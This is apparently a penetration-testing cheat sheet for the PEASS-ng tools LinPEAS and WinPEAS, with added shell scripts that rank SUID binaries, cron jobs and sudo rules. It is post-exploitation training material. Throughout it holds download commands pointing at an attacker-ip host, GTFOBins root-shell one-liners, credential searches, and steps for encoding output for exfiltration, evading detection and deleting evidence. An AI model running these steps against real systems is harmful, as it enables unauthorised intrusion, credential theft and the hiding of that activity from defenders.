PEASS-ng (Priv<br>ilege Escalation Awesome Scripts Suite) is a set of self-contained local enumeration tools: LinPEAS (a single bash script, with the macOS checks of MacPEAS built into it) for Linux/macOS, and WinPEAS (a C# binary, plus a reduced batch-file version) for Windows. They are the standard first step in post-exploitation and CTF work for quickly surfacing misconfigurations, weak permissions and exposed credentials. They enumerate and highlight; exploitation is a separate step, and every red finding still has to be verified by hand.
PEASS-ng components:
| Component | Target | Language | Purpose |
|---|---|---|---|
| LinPEAS (linpeas.sh) | Linux, macOS (the MacPEAS checks live in the same script) | Bash | Automated privilege escalation enumeration |
| WinPEAS .exe (winPEASany.exe, winPEASx64.exe, winPEASx86.exe) | Windows | C# (.NET Framework) | Windows privilege escalation enumeration |
| WinPEAS .bat (winPEAS.bat) | Windows | Batch | Reduced set of the same checks for hosts where the .exe cannot be run |
JAWS (Just Another Windows (Enum) Script), which some cheat sheets bundle with these, is a separate PowerShell project, not part of PEASS-ng. GitHub release asset names are case-sensitive: the .exe and .bat files are winPEAS*, the script is linpeas.sh.
# Download from GitHub
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
# Fetch directly on the target (needs outbound internet from the host)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
# Serve it from the attacking host instead
python3 -m http.server 8000
# On target: curl http://attacker-ip:8000/linpeas.sh -o linpeas.sh
# Paste it through the terminal as base64 (no network path to the target); -w0 is GNU base64, macOS base64 does not wrap by default
base64 -w0 linpeas.sh
# On target: echo "base64-content" | base64 -d > linpeas.sh
# Make executable and run
chmod +x linpeas.sh
./linpeas.sh
LinPEAS flags (as printed by `./linpeas.sh -h`; flags change between releases, so the help text is authoritative). There is no "quiet", "sudo-only" or "CVE test" mode: -q only hides the banner, and -s, -a, -t and -p mean something else:
| Flag | Description |
|---|---|
| -h | Show help |
| -q | Do not show the banner (the checks are unchanged) |
| -a | All checks, noisy: about a minute of process monitoring plus `su` brute-force of local users with a small password list; for CTFs mainly |
| -s | SuperFast / stealth mode: skips the time-consuming checks |
| -e | Perform extra enumeration |
| -r | Enable the regex searches for credentials inside files (minutes to hours) |
| -o <checks> | Run only the listed checks, comma-separated, using the names printed by -h (e.g. system_information, procs_crons_timers_srvcs_sockets, users_information, interesting_perms_files, interesting_files, api_keys_regex) |
| -P <password> | Password used to run `sudo -l` and to try `su` against other local accounts |
| -w | Wait between big blocks of checks (no argument) |
| -N | Do not use colours (use when writing to a file) |
| -t | Automatic network recon and port scanning (noisy, not recommended) |
| -d <IP/mask>, -p <ports>, -i <IP> | Host discovery with ping/fping and port scanning with nc |
| -L / -M | Force the LinPEAS / MacPEAS check set |
| -D | Debug mode |
# Default run, keeping a copy; -N drops the colour codes so the file is readable anywhere
./linpeas.sh -N 2>&1 | tee linpeas.txt
# Only selected blocks of checks (names from -h)
./linpeas.sh -o users_information,interesting_perms_files
# Full noisy run: process monitoring for a minute plus su brute-force (CTF use)
./linpeas.sh -a
# Stealthier: skip the time-consuming checks
./linpeas.sh -s
# Let LinPEAS run sudo -l and su attempts with a password you already know (hypothetical value)
./linpeas.sh -P 'Winter2024!'
# Regex credential hunting inside files (slow)
./linpeas.sh -r
# Pause between big blocks of checks
./linpeas.sh -w
# Stand-alone builds (no usable bash: restricted shell, minimal container, BusyBox-only host)
# The release page also ships statically compiled linpeas_linux_{386,amd64,arm,arm64} and linpeas_darwin_{amd64,arm64}
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64 -a
# linpeas_fat.sh (helper binaries embedded in the script) and linpeas_small.sh (trimmed, for size-constrained transfers) are the other variants
# Download the .exe (compiled C#; needs the .NET Framework on the target). Asset names are case-sensitive:
# winPEASany.exe (AnyCPU build, runs as x86 or x64), winPEASx64.exe, winPEASx86.exe, plus *_ofs.exe obfuscated builds
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe
# Download the .bat (batch script, reduced checks, for hosts where the .exe cannot run)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEAS.bat
# Execute .exe
winPEASany.exe
# Execute .bat (cmd.exe)
winPEAS.bat
# Renaming before execution only defeats file-name matching (OPSEC); a "svchost.exe" running from a user directory is itself a standard detection, so choose a name that fits the host
ren winPEASany.exe inv-check.exe
inv-check.exe
WinPEAS .exe options (no dash prefix; several can be combined on one command line):
| Option | Description |
|---|---|
| help | Show the option list |
| quiet | Do not print the banner |
| notcolor | Disable ANSI colours (use when redirecting to a file) |
| log[=file] | Write output to a file (out.txt when no name is given) |
| wait | Wait for a key press between checks |
| searchfast | Quick file search (skips the slow checks) |
| searchall | Comprehensive file search (longer runtime) |
| systeminfo, userinfo, processinfo, servicesinfo, applicationsinfo, networkinfo, windowscreds, browserinfo, filesinfo, fileanalysis, eventsinfo, domain | Run only the named check categories |
# Quick enumeration
winPEASany.exe searchfast
# Comprehensive enumeration
winPEASany.exe searchall
# Banner off, everything to a file (stealth)
winPEASany.exe quiet log=output.txt
# No colour codes (the output is meant to be read from a file)
winPEASany.exe searchall notcolor > results.txt
# Only the services and stored-credential checks
winPEASany.exe servicesinfo windowscreds
# LinPEAS lists SUID/SGID binaries and colours the ones GTFOBins has an entry for (red/yellow)
# Look for: red-coloured entries = known privilege escalation vector; anything not in the distribution's default set is worth a look
# Manual check if LinPEAS missed anything
find / -perm -4000 -type f 2>/dev/null
# Look up each unexpected binary on GTFOBins (https://gtfobins.github.io/), "SUID" section
# Example: a SUID /usr/bin/find gives a root shell with "find . -exec /bin/sh -p \; -quit" (-p stops sh from dropping the effective uid)
# LinPEAS lists file capabilities that can be abused
# Examples: cap_setuid (a python3 carrying it can os.setuid(0) and spawn a shell), cap_dac_override and cap_dac_read_search (bypass file permission checks, e.g. read /etc/shadow), cap_sys_admin (mounts, namespaces)
# Manual check
getcap -r / 2>/dev/null
# High-risk: cap_setuid, cap_setgid, cap_dac_override, cap_dac_read_search, cap_sys_admin, cap_sys_ptrace, cap_sys_module, cap_chown, cap_fowner
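To turn the two manual checks above into one pass that also does the GTFOBins cross-reference, here is an added example (not LinPEAS code) in POSIX sh. The GTFOBins subset and the list of dangerous capabilities are assumed, abbreviated lists, and the verdict words are this example's own; point it at a root directory (/ on a real host). The capability parser accepts both getcap output styles, so it works on old and new libcap.

```shell
#!/bin/sh
# suid_caps.sh: enumerate SUID/SGID files and file capabilities under a root directory and mark
# the ones worth a GTFOBins lookup (added example, not LinPEAS code). The GTFOBins subset and the
# dangerous-capability list below are assumed, abbreviated lists.

GTFO_SUID="bash busybox cp env find less more nmap perl php python python3 vim vi awk gawk tar zip base64 xxd dd"
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner"

# is_listed WORD LIST: true if WORD occurs as a whole word in the space-separated LIST
is_listed() {
  case " $2 " in *" $1 "*) return 0 ;; esac
  return 1
}

# enum_suid ROOT: one line per setuid/setgid file: SUID|path|GTFO or SUID|path|-
enum_suid() {
  find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort | while IFS= read -r f; do
    if is_listed "$(basename "$f")" "$GTFO_SUID"; then tag=GTFO; else tag=-; fi
    printf 'SUID|%s|%s\n' "$f" "$tag"
  done
}

# rate_caps PATH CAPS: classify one getcap entry (split out so it can be tested without getcap)
rate_caps() {
  tag=-
  for c in $DANGEROUS_CAPS; do
    case "$2" in *"$c"*) tag=DANGEROUS; break ;; esac
  done
  printf 'CAP|%s|%s|%s\n' "$1" "$2" "$tag"
}

# enum_caps ROOT: one line per file carrying capabilities: CAP|path|caps|DANGEROUS or CAP|path|caps|-
# getcap prints "path caps" on libcap 2.41+ and "path = caps" on older releases; both are handled.
enum_caps() {
  command -v getcap >/dev/null 2>&1 || { echo "enum_caps: getcap not installed" >&2; return 0; }
  getcap -r "${1:-/}" 2>/dev/null | while IFS= read -r line; do
    path="${line%% *}"
    caps="${line#* }"; caps="${caps#= }"
    rate_caps "$path" "$caps"
  done
}

# stand-alone use: suid_caps.sh ROOT   (e.g. suid_caps.sh /)
if [ -n "${1:-}" ]; then enum_suid "$1"; enum_caps "$1"; fi
```

A GTFO tag means "go and read the GTFOBins page", not "exploitable": a SUID vim that is only setgid to a harmless group is noise, and the capability check is deliberately a substring match so cap_dac_override=eip and cap_dac_override+ep are both caught.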
# LinPEAS enumerates cron jobs (and systemd timers) and checks for:
# - Scripts or binaries run by a job that the current user can write to
# - Jobs that run something from /tmp or another user-writable directory, or by a bare name resolved through cron's PATH
# - Weak permissions on the crontab files themselves
# Manual check
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /var/spool/cron/crontabs/ 2>/dev/null   # root-only on most distributions
# LinPEAS identifies writable locations that matter:
# - /tmp, /var/tmp, /dev/shm (world-writable by design; relevant when a privileged job reads from them)
# - Libraries and modules loaded by privileged processes (writable .so files, python modules, /etc/ld.so.preload)
# - Directories in PATH (a writable entry lets you plant a binary that a root script calls by bare name)
find /usr/bin -writable 2>/dev/null
find /lib -writable 2>/dev/null
echo "$PATH" | tr ':' '\n' | xargs ls -ld
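The cron and PATH checks above are mechanical enough to script. The following is an added example, not LinPEAS code: it parses system-crontab lines, classifies the target each job runs (writable file, missing file in a writable directory, bare name resolved through PATH, wildcard in the arguments), and reports writable or missing PATH entries. The verdict names are this example's own, and the sample crontab in the test is constructed.

```shell
#!/bin/sh
# cron_path_check.sh: rate the command each cron entry runs, and the directories in PATH, the way
# LinPEAS' cron and PATH checks do (added example, not LinPEAS code).

# cron_command LINE [system|user]: the command part of a crontab line. System-format files
# (/etc/crontab, /etc/cron.d/*) carry a user field between the schedule and the command;
# @reboot-style lines have a one-word schedule.
cron_command() {
  fmt="${2:-system}"
  set -f                       # the schedule contains "*": no globbing while the line is split
  set -- $1
  set +f
  case "$1" in @*) n=1 ;; *) n=5 ;; esac
  if [ "$fmt" = system ]; then n=$((n + 1)); fi
  [ $# -gt "$n" ] || { echo ""; return 0; }
  shift "$n"
  printf '%s\n' "$*"
}

# check_cron_line LINE [system|user]: VERDICT|target|command, VERDICT one of WRITABLE-TARGET,
# MISSING-TARGET-IN-WRITABLE-DIR, TARGET-DIR-WRITABLE, PATH-LOOKUP, ok, optionally ",WILDCARD"
check_cron_line() {
  line="$1"
  case "$line" in ''|'#'*|[A-Za-z_]*=*) return 0 ;; esac    # blank, comment or VAR=value line
  cmd="$(cron_command "$line" "${2:-system}")"
  [ -n "$cmd" ] || { printf 'MALFORMED||%s\n' "$line"; return 0; }
  target="${cmd%% *}"
  case "$target" in
    */*)
      dir="$(dirname "$target")"
      if [ -w "$target" ]; then verdict=WRITABLE-TARGET
      elif [ ! -e "$target" ] && [ -w "$dir" ]; then verdict=MISSING-TARGET-IN-WRITABLE-DIR
      elif [ -w "$dir" ]; then verdict=TARGET-DIR-WRITABLE
      else verdict=ok
      fi ;;
    *) verdict=PATH-LOOKUP ;;   # bare name: resolved through cron's PATH (or a PATH= line in the file)
  esac
  case "$cmd" in *'*'*) verdict="$verdict,WILDCARD" ;; esac   # e.g. "tar ... *": argument injection
  printf '%s|%s|%s\n' "$verdict" "$target" "$cmd"
}

# check_cron_file FILE [system|user]: one verdict line per job in FILE
check_cron_file() {
  while IFS= read -r l || [ -n "$l" ]; do check_cron_line "$l" "${2:-system}"; done < "$1"
}

# check_path [PATH-STRING]: WRITABLE|dir, MISSING|dir or ok|dir for each entry (empty entry = ".")
check_path() {
  printf '%s\n' "${1:-$PATH}" | tr ':' '\n' | while IFS= read -r dir; do
    [ -n "$dir" ] || dir=.
    if [ ! -d "$dir" ]; then printf 'MISSING|%s\n' "$dir"
    elif [ -w "$dir" ]; then printf 'WRITABLE|%s\n' "$dir"
    else printf 'ok|%s\n' "$dir"
    fi
  done
}

# stand-alone use: cron_path_check.sh /etc/crontab /etc/cron.d/*   (also reports the caller's PATH)
if [ -n "${1:-}" ]; then
  for f in "$@"; do check_cron_file "$f" system; done
  check_path
fi
```

Cron itself runs jobs with its own PATH (typically /usr/bin:/bin unless the crontab sets PATH=), so a PATH-LOOKUP verdict is only exploitable when one of those directories, or one named in the file's PATH= line, is writable; pass that string to check_path to find out. Remember that as root every file tests writable, so run this as the low-privileged account whose options you are assessing.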
# LinPEAS searches for:
# - Plaintext passwords in config files (web app configs, .env files, database client configs)
# - SSH private keys in ~/.ssh/ and elsewhere on disk, and whether other users can read them
# - Database credentials in application configs
# - .bash_history, .zsh_history, .mysql_history lines where a password was typed on the command line
grep -rniE 'passw(or)?d|secret|api[_-]?key' /etc /var/www /opt 2>/dev/null | head
grep -niE 'passw|api[_-]?key|token' ~/.bashrc ~/.bash_history 2>/dev/null
# LinPEAS runs sudo -l non-interactively (pass the password with -P if you know it)
sudo -l
# Critical finding: NOPASSWD entries, ALL, wildcards, or any entry for a binary that can spawn a shell or write files
# Example: (ALL) NOPASSWD: /usr/bin/find
# Exploit: sudo find . -exec /bin/sh \; -quit
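Reading sudo -l output by eye is where entries get missed, so here is an added example (not LinPEAS code) that parses the rule lines and ranks each command: ALL, wildcards, NOPASSWD, binaries with a GTFOBins sudo entry, rules with no fixed arguments, and scripts the current user can overwrite. The GTFOBins subset is an assumed handful of well-known names, the severity labels are this example's own, and sample_sudo_l prints a constructed transcript.

```shell
#!/bin/sh
# sudo_rules.sh: parse the rule lines of "sudo -l" and rank each command (added example, not
# LinPEAS code). GTFO_SUDO is an assumed, abbreviated subset of GTFOBins' sudo entries.

GTFO_SUDO="find vim vi less more nano man awk gawk python python3 perl ruby env bash sh tar zip cp mv tee git tcpdump nmap"

is_listed() {
  case " $2 " in *" $1 "*) return 0 ;; esac
  return 1
}

# rate_sudo_command RUNAS NOPASSWD(0|1) COMMAND -> SEVERITY|runas|tags|command
rate_sudo_command() {
  runas="$1"; nopw="$2"; cmd="$3"; tags=""; sev=LOW
  bin="${cmd%% *}"
  if [ "$nopw" = 1 ]; then tags="NOPASSWD"; fi
  if [ "$bin" = ALL ]; then
    tags="$tags,ALL"; sev=HIGH
  else
    case "$cmd" in *'*'*) tags="$tags,WILDCARD"; sev=HIGH ;; esac
    if is_listed "$(basename "$bin")" "$GTFO_SUDO"; then tags="$tags,GTFOBINS"; sev=HIGH; fi
    if [ "$bin" = "$cmd" ]; then tags="$tags,ANY-ARGS"; fi           # rule fixes no arguments
    if [ -w "$bin" ]; then tags="$tags,WRITABLE-BINARY"; sev=HIGH; fi  # a script we can edit runs as root
  fi
  if [ "$sev" = LOW ] && [ "$nopw" = 1 ]; then sev=MEDIUM; fi
  printf '%s|%s|%s|%s\n' "$sev" "$runas" "${tags#,}" "$cmd"
}

# parse_sudo_l < transcript: rate every command of every "(runas) [TAG:] cmd, cmd" line that
# follows the "may run the following commands" header
parse_sudo_l() {
  in_rules=0
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in *"may run the following commands"*) in_rules=1; continue ;; esac
    [ "$in_rules" = 1 ] || continue
    line="${line#"${line%%[! ]*}"}"                  # strip the indentation (sudo uses spaces)
    case "$line" in "("*")"*) ;; *) continue ;; esac
    runas="${line#(}"; runas="${runas%%)*}"
    rest="${line#*) }"
    nopw=0
    while :; do                                      # leading tags: NOPASSWD:, SETENV:, NOEXEC: ...
      case "$rest" in
        NOPASSWD:*) nopw=1; rest="${rest#NOPASSWD:}"; rest="${rest# }" ;;
        PASSWD:*|SETENV:*|NOSETENV:*|EXEC:*|NOEXEC:*) rest="${rest#*:}"; rest="${rest# }" ;;
        *) break ;;
      esac
    done
    while [ -n "$rest" ]; do                         # commands in one rule are separated by ", "
      case "$rest" in *", "*) cmd="${rest%%, *}"; rest="${rest#*, }" ;; *) cmd="$rest"; rest="" ;; esac
      rate_sudo_command "$runas" "$nopw" "$cmd"
    done
  done
}

# sample_sudo_l: constructed "sudo -l" transcript for a low-privileged web account
sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for www-data on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/sbin/nginx -s reload
    (ALL : ALL) ALL
    (root) NOPASSWD: /opt/scripts/backup.sh, /usr/bin/vim /etc/hosts
    (root) /usr/bin/tar -cf /var/backups/www.tar /var/www/*
EOF
}

# stand-alone use: sudo -l > sudo.txt; sudo_rules.sh sudo.txt   (or sudo_rules.sh --sample)
if [ "${1:-}" = --sample ]; then sample_sudo_l | parse_sudo_l
elif [ -n "${1:-}" ]; then parse_sudo_l < "$1"
fi
```

A rule with fixed arguments (vim /etc/hosts) still rates HIGH when the binary is on GTFOBins, because vim's `:!sh` works regardless of which file it opened; the ANY-ARGS tag is there to separate that case from rules where you also control the argument list.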
# WinPEAS flags services whose binary path contains spaces and is not quoted
# Example: C:\Program Files\My App\service.exe
# Windows tries C:\Program.exe, then C:\Program Files\My.exe, before the real path; write access to a directory on that chain plus a service restart (or a reboot) runs your binary as the service account, usually SYSTEM
# Manual check: auto-start services outside C:\Windows whose path has no quotes (wmic is deprecated but still present on most builds)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# WinPEAS checks whether the current user can modify service binaries or service configuration
# High risk: write access to the service binary or its directory, or SERVICE_CHANGE_CONFIG on the service (lets you point it at your own binary)
# Check the binary's ACL manually; look for (F), (M) or (W) granted to Users, Authenticated Users or Everyone
icacls "C:\Program Files\Service\service.exe"
# WinPEAS searches the registry for:
# - Writable keys under HKLM (a service's ImagePath, for example)
# - Plaintext passwords in value names or data
# - Autologon (Winlogon DefaultPassword), PuTTY sessions and similar stored credentials
reg query HKLM /f password /t REG_SZ /s
# WinPEAS looks for:
# - Credential Manager entries and LSA cached credentials
# - Credentials in application configs (.xml, .ini, .json, web.config, unattend.xml)
# - Autologon credentials in the registry
# - DPAPI-protected blobs (master keys and Credential Manager files; decrypting them needs the user's password or the domain backup key)
# Manual check
cmdkey /list
findstr /si password *.xml *.ini *.txt *.config
# WinPEAS checks whether the current user can write to sensitive files and directories
# High risk: a writable .exe or .dll in a directory that a privileged process loads from (System32, Program Files, a service's own folder)
# Check individual files with icacls; a system-owned file should show only SYSTEM and Administrators with (F), everyone else (R) at most
icacls "C:\Windows\System32\drivers\etc\hosts"
# HTTP download (fastest, requires internet)
curl -o linpeas.sh http://attacker-ip:8000/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
# wget alternative
wget http://attacker-ip:8000/linpeas.sh -O linpeas.sh
# Python one-liner (if Python available)
python3 -c "import urllib.request; urllib.request.urlretrieve('http://attacker-ip:8000/linpeas.sh', 'linpeas.sh')"
# Bash /dev/tcp (no curl/wget; needs bash, not dash, and the HTTP headers have to be stripped from the response)
exec 3<>/dev/tcp/attacker-ip/8000
printf 'GET /linpeas.sh HTTP/1.0\r\nHost: attacker-ip\r\n\r\n' >&3
sed '1,/^\r$/d' <&3 > linpeas.sh    # GNU sed: drop everything up to the blank line that ends the headers
exec 3>&-
# scp (if SSH access)
scp attacker@attacker-ip:/path/linpeas.sh .
# Base64 via clipboard/email
base64 -w0 linpeas.sh
# Decode on target: echo "base64..." | base64 -d > linpeas.sh
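The base64 transfer above, like the one in the LinPEAS download section, fails silently when a paste is truncated or re-wrapped by the terminal, and a half-written script is then what runs on the target. This added example (not PEASS-ng code) wraps both ends in small sh functions: the sender prints a digest header in front of the base64 body, and the receiver refuses to install the file unless the SHA-256 of what it decoded matches. It assumes at least one of sha256sum, shasum or openssl exists on each side; the file names in the usage are placeholders.

```shell
#!/bin/sh
# b64_transfer.sh: copy-paste transfer with an integrity check (added example, not PEASS-ng code).
# Sender:   b64_transfer.sh pack linpeas.sh > linpeas.b64     (paste the text into the target's shell)
# Receiver: b64_transfer.sh unpack linpeas.sh < linpeas.b64   (refuses to write the file on mismatch)

# sha256_of FILE: hex digest with whichever tool the host has (assumption: one of these is present)
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
  elif command -v shasum >/dev/null 2>&1; then shasum -a 256 "$1" | cut -d' ' -f1
  elif command -v openssl >/dev/null 2>&1; then openssl dgst -sha256 "$1" | awk '{print $NF}'
  else echo "sha256_of: no sha256 tool found" >&2; return 1
  fi
}

# pack FILE: print "SHA256 <digest> <bytes>", then the body as 76-column base64.
# fold, rather than base64 -w, keeps the lines short on GNU, BusyBox and macOS alike.
pack() {
  printf 'SHA256 %s %s\n' "$(sha256_of "$1")" "$(wc -c < "$1" | tr -d ' ')"
  base64 < "$1" | tr -d '\n' | fold -w 76
  printf '\n'
}

# unpack OUT: read a packed stream on stdin, decode to a temp file, verify the digest, then
# install it as OUT with mode 700. Nothing is written to OUT unless the digest matches.
unpack() {
  out="$1"
  IFS= read -r hdr || return 1
  want="${hdr#SHA256 }"; want="${want%% *}"
  case "$want" in *[!0-9a-f]*|'') echo "unpack: bad header: $hdr" >&2; return 1 ;; esac
  tmp="$out.part.$$"
  if ! base64 -d > "$tmp"; then rm -f "$tmp"; echo "unpack: base64 decode failed" >&2; return 1; fi
  got="$(sha256_of "$tmp")"
  if [ "$got" != "$want" ]; then
    rm -f "$tmp"
    echo "unpack: digest mismatch (want $want, got $got): paste truncated or altered" >&2
    return 1
  fi
  chmod 700 "$tmp" && mv "$tmp" "$out"
}

case "${1:-}" in
  pack)   pack "$2" ;;
  unpack) unpack "$2" ;;
esac
```

The digest line doubles as a record of exactly which build you ran on the target, which matters when a finding has to be reproduced later; compare it against the sha256 of the release asset you downloaded before packing.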
# PowerShell (most reliable; add -UseBasicParsing on old PowerShell 3/4 hosts)
powershell -Command "Invoke-WebRequest -Uri 'http://attacker-ip:8000/winPEASany.exe' -OutFile 'winPEASany.exe'"
# certutil (built in, no PowerShell needed; also one of the most signatured LOLBins, expect an AV/EDR alert)
certutil -urlcache -split -f http://attacker-ip:8000/winPEASany.exe winPEASany.exe
# bitsadmin (background intelligent transfer; the destination must be an absolute path)
bitsadmin /transfer peas /download /priority normal http://attacker-ip:8000/winPEASany.exe %cd%\winPEASany.exe
# ftp from cmd.exe: scripted session (-n suppresses auto-login so the "user" line is honoured)
echo open attacker-ip > ftp.txt
echo user anonymous anonymous >> ftp.txt
echo binary >> ftp.txt
echo get winPEASany.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
# Direct from GitHub (if the host has internet)
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe' -OutFile 'winPEASany.exe'"
# 1. Rename the script before execution (defeats file-name matching only: the process is still bash, and a Linux file called svchost is itself odd)
cp linpeas.sh .update.sh
./.update.sh
# 2. Skip the time-consuming checks (LinPEAS has no "quiet" mode; -q only hides the banner)
./linpeas.sh -s
# 3. Pause between big blocks of checks (-w takes no argument)
./linpeas.sh -w
# 4. Keep output off the terminal: colours off, everything in one file
./linpeas.sh -N > /tmp/.enum.txt 2>&1
# 5. Compress and encode before exfiltration
gzip -c /tmp/.enum.txt | base64 -w0 > /tmp/.enum.b64
# 6. Run during normal activity windows; each run is still a burst of process creation that auditd or EDR execve rules record
# Use cron or at for delayed execution only where a scheduled job is less conspicuous than an interactive one on that host
# 7. Clean up after execution (including the shell history of the account you used)
rm -f linpeas.sh .update.sh /tmp/.enum.txt /tmp/.enum.b64
# 8. Windows: AV signatures WinPEAS itself; the release ships obfuscated *_ofs.exe builds. UAC is not a barrier to enumeration (it runs as the current user), and AMSI only matters if the assembly is loaded reflectively from PowerShell
# A binary named svchost.exe or taskhost.exe running outside System32 is a detection on its own; use a name that fits the host
# Linux: LinPEAS' protections and process sections show what is watching (SELinux/AppArmor, auditd, EDR agents); read them before running anything noisier
# General: review findings offline, don't run exploits interactively
# Extract LinPEAS output → analyse locally → execute exploits separately
# Use LinPEAS' kernel/OS findings to sanity-check Metasploit's local exploit suggester, and vice versa
# Run LinPEAS → export findings → compare with the suggester's list in msfconsole
msfconsole
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
# Cross-reference SUID binaries and sudo rules from LinPEAS with GTFOBins (https://gtfobins.github.io/)
# Example: LinPEAS shows /usr/bin/find as SUID
# GTFOBins, SUID section: ./find . -exec /bin/sh -p \; -quit
# On Windows, run both WinPEAS and PrivescCheck (PowerShell) for coverage
# WinPEAS: broader set of checks, colour-coded output
# PrivescCheck: structured results and deeper registry/WMI checks
# Combine findings for a complete privilege escalation map
LinPEAS prints this legend at the top of its output:
| Colour | Meaning |
|---|---|
| Red/Yellow | 95% a privilege escalation vector |
| Red | You should take a look at it |
| Light cyan | Users with a console |
| Blue | Users without a console, and mounted devices |
| Green | Common things (users, SUID binaries, etc.) |
| Light magenta | Your own username |
- Kernel, OS & Devices: System version, kernel exploits
- Users & Groups: Local users, groups, sudo access
- User & Privilege Related: Current user context, sudo capabilities
- Environment: PATH, libraries, writable locations
- SUID & SGID: Setuid/setgid binaries with exploitation potential
- Capabilities: Linux capabilities on binaries
- Cron Jobs: Scheduled tasks and writability
- Files: Interesting files, SSH keys, credentials
- Network: Listening ports, established connections
- Packages: Installed applications with known vulnerabilities
# Most useful combination: full run, no colour codes, copy kept
./linpeas.sh -N 2>&1 | tee linpeas-output.txt
# CTF speed-run: everything, including the slow and noisy checks
./linpeas.sh -a
# Stealthier: skip the time-consuming checks
./linpeas.sh -s
# No usable bash (restricted shell, minimal container): stand-alone build
./linpeas_linux_amd64
# WinPEAS: quick enumeration, save output
winPEASany.exe searchfast log=results.txt
# Stealth: banner off, no colour, file output, renamed binary (a system-binary name outside System32 is itself a detection; pick something that fits the host)
ren winPEASany.exe inv-check.exe
inv-check.exe quiet notcolor log=c:\temp\.report.txt
- Run PEASS-ng → Get full enumeration
- Analyze output → Identify high-risk findings
- Verify findings → Manually test privilege escalation vector
- Exploit → Use GTFOBins, public exploits, or custom scripts
- Verify success → Confirm root/SYSTEM access
- Clean up → Remove scripts and evidence